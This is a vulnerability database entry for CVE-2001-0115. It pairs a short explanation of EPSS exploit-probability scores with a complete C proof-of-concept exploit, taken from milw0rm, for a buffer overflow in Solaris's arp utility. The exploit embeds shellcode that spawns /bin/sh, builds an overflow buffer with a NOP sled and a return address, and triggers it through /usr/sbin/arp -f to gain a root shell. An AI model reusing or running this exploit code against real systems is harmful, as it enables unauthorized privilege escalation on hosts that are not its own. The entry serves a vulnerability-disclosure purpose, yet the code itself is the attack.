CVE-2001-0115 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/* arp overflow proof of concept by [email protected] shellcode originally written by Cheez Whiz. tested on x86 solaris 7,8beta default should work. if not, arg1 = offset. +- by 100's Copyright Security-Focus.com, 11/2000 */ long get_esp() { __asm__("movl %esp,%eax"); } int main(int ac, char **av) { char shell[] = "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff" "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46" "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0" "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52" "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff" "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08" "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b" "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8" "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f" "\x73\x68\xff\xff\xff\xff\xff\xff\xff" "\xff\xff"; unsigned long magic = 0x8047b78; unsigned long r = get_esp() + 600; unsigned char buf[300]; int f; if (ac == 2) r += atoi(av[1]); memset(buf,0x61,sizeof(buf)); memcpy(buf+52,&magic,4); memcpy(buf+76,&r,4); f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600); write(f,"1 2 3 4 ",8); write(f,buf,sizeof(buf)); close(f); memset(buf,0x90,sizeof(buf)); memcpy(buf,"LOL=",4); memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell)); putenv(buf); system("/usr/sbin/arp -f /tmp/ypx"); unlink("/tmp/ypx"); } // milw0rm.com [2001-01-15]